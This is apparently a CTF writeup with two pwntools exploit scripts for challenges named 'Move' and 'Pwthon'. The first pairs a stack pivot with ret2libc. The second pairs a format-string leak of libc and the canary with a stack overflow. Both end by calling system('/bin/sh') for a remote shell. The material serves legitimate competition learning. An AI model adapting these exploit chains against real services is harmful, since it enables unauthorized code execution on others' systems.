Move
栈迁移+ret2libc
from pwn import *

# Challenge endpoint and the libc file shipped with the task.
io = remote('123.56.25.124', 22278)
context.binary = 'pwn'
libc = ELF('libc.so.6', checksec=False)


def recv_n(count):
    """Read exactly *count* bytes from the connection."""
    return io.recv(count)


def send_after(marker, data):
    """Wait until *marker* has been received, then send *data*."""
    io.sendafter(marker, data)


def unpack_u64(raw):
    """Zero-pad a short little-endian leak to 8 bytes and unpack it."""
    return u64(raw.ljust(8, b'\x00'))


# Fixed addresses inside the challenge binary (the 0x40xxxx values suggest
# it is not position-independent -- not verified here). The names follow the
# original script; the leak below subtracts libc.sym['puts'], so GOT_ENTRY /
# PLT_ENTRY are presumably puts' GOT slot and PLT stub.
POP_RDI = 0x0000000000401353
GOT_ENTRY = 0x0000000000404018
PLT_ENTRY = 0x0000000000401080
MAIN = 0x0000000000401264

# Round 1: call the PLT stub with the GOT slot as its argument and come back
# to main. The 6-byte reply read further down is treated as puts' address.
leak_chain = flat([POP_RDI, GOT_ENTRY, PLT_ENTRY, MAIN])
send_after('lets travel again!\n', leak_chain)
send_after('Input your setp number', p32(0x12345678))

# Round 2: the stack-migration frame from the writeup title. Offset 0x30
# carries a new frame pointer and 0x38 a return address inside the binary;
# what those two locations are cannot be recovered from this script alone.
pivot_frame = flat({
    0x38 - 8: 0x00000000004050A0 - 8,
    0x38: 0x00000000004012E0,
})
send_after('TaiCooLa', pivot_frame)

# Resolve libc from the leaked puts address.
libc_base = unpack_u64(recv_n(6)) - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
# NOTE: `.next()` is the Python 2 iterator method; Python 3 spells it next(...).
binsh_addr = libc_base + libc.search('/bin/sh').next()

# Round 3: system("/bin/sh"), returning to main afterwards.
shell_chain = flat([POP_RDI, binsh_addr, system_addr, MAIN])
send_after('lets travel again!\n', shell_chain)
io.interactive()
Pwthon
格式化字符串+栈溢出
from pwn import *

# Challenge endpoint; the libc is taken from the local system path.
io = remote('123.56.9.101', 26410)
context.bits = 64
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)


def recv_until(marker):
    """Read through *marker* and return the bytes that preceded it."""
    return io.recvuntil(marker, drop=True)


def raw_send(data):
    """Send *data* without a trailing newline."""
    io.send(data)


def send_line(data):
    """Send *data* followed by a newline."""
    io.sendline(data)


def menu(choice):
    """Answer the `> ` prompt with the given menu number."""
    io.sendlineafter('> ', str(choice))


# Round 1: the "gift" line is a hex address. The subtracted constant is the
# distance from that value to the module base, presumably recorded from a
# debugger session by the author.
menu(0)
recv_until('Give you a gift')
app_base = int(recv_until('\n'), 16) - (0x7fd4ccdf88b0 - 0x7fd4ccdf2000)

# 0x1a '%llx,' conversions, then a bare newline to finish the input line.
raw_send('%llx,' * 0x1a)
send_line('')
leak = recv_until('\n')
# The 12 hex digits before the trailing ',' are treated as a libc pointer;
# the offset to the libc base again comes from the author's notes.
libc_base = int(leak[-13:-1], 16) - (0x7f54772a6cdd - 0x7f5477197000)
system_addr = libc_base + libc.sym['system']
# NOTE: `.next()` is the Python 2 iterator method; Python 3 spells it next(...).
binsh_addr = libc_base + libc.search('/bin/sh').next()

# Round 2: same menu entry, this time to read the stack canary.
menu(0)
recv_until('Give you a gift')
recv_until('\n')  # the gift value is consumed but not used here
raw_send('%lx,' * 50)
send_line('')
leak = recv_until('>')
# 16 hex digits taken from near the end of the output, before the prompt.
canary = int(leak[-19:-3], 16)

# Gadgets at fixed offsets from the leaked module base (named by the author).
pop_rdi = app_base + 0x0000000000003f8f
ret = app_base + 0x000000000000301a

# Round 3: the overflow. The menu choice is sent straight away instead of
# waiting for the prompt, exactly as in the original script.
send_line('0')
recv_until('Give you a gift')
raw_send('a')
# Frame layout: canary at 0x108, then four `ret` slots (presumably covering
# the saved frame pointer and keeping the stack aligned), then
# pop rdi; "/bin/sh"; system.
payload = flat({
    0x108: canary,
    0x110: ret,
    0x118: ret,
    0x120: ret,
    0x128: ret,
    0x130: pop_rdi,
    0x138: binsh_addr,
    0x140: system_addr,
})
raw_send(payload)
io.interactive()
一开始脑抽一直想着把cpython的so文件还原成python代码（一血又没了）